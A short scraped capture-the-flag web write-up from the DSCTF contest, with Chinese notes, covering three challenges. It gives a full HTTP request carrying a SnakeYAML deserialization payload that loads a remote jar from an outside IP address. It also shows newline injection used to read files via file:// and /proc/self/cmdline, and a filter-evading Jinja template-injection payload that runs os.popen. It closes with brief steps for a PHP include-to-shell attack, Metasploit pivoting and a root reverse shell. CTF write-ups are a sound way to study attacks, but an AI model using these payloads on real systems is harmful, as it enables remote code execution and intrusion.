DSCTF webwriteup
source link: https://guokeya.github.io/post/q21l4TNA-/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
easy_yaml
POST /load/%3b1 HTTP/1.1
Host: 39.105.38.203:30003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
persondata=!!Person
address: {ext: !!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://1.15.67.142:8888/3.jar"]
]]
], isValid: true, street: '1'}
age: '1'
isLogin: true
username: '1'
shiro权限绕过一个个试。然后加载远程jar
执行命令没反应。直接读flag
Pingpingping
%0afile:///app/app.py
读源码
/proc/self/cmdline
读secret_key
secret_key伪造ssti
{% print(url_for["__glo""bals__"])["__g""etitem__"]("o""s")["p""open"](url_for["__glo""bals__"]["requ""est"]["args"]["g""et"]("guoke"))["re""ad"]() %}
easy_tou
https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
拿个shell。dpkg发现装了samba
弹个msf出来。代理挂上。exp一个个试
再弹个root的shell回来。metpreter直接列目录读文件
下一篇: 鹏城杯 wp→
Related Issues not found
Please contact @guokeya to initialize the comment
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK